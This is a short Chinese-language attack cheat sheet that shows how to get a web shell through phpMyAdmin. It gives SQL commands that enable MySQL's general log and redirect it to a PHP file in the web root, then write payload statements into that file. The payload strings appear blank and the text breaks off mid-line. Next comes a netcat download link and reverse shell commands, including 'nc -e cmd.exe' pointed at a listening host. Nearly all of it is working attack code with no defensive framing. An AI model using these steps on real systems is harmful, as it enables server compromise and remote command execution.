phpmyadmin set general_log_file getshell

#查看是否有写文件权限
show global variables like ‘%secure%’;
#select ‘‘ into outfile ‘C:/phpStudy/www/o.php’;

#查看日志文件存放路径及开启
SHOW GLOBAL VARIABLES LIKE ‘%general_log%’
set global general_log = ON

#根据上面返回的日志位置,猜出web路径,设置日志文件
SET global general_log_file=’C:/phpStudy/WWW/1.php’;
#或者访问0.0.0.0/phpinfo.php 可能看到web绝对路径

#执行sql语句
SELECT ‘‘;
SELECT ‘‘;

#下载 nc 或者直接使用菜刀
https://eternallybored.org/misc/netcat/
#nc反弹 cmd
nc -vv -l -p 端口号 #本机
nc -e cmd.exe 监听主机IP地址 端口 #服务器

#####
SET global general_log_file=’C:/phpStudy/PHPTutorial/WWW/1.php’;
SELECT ‘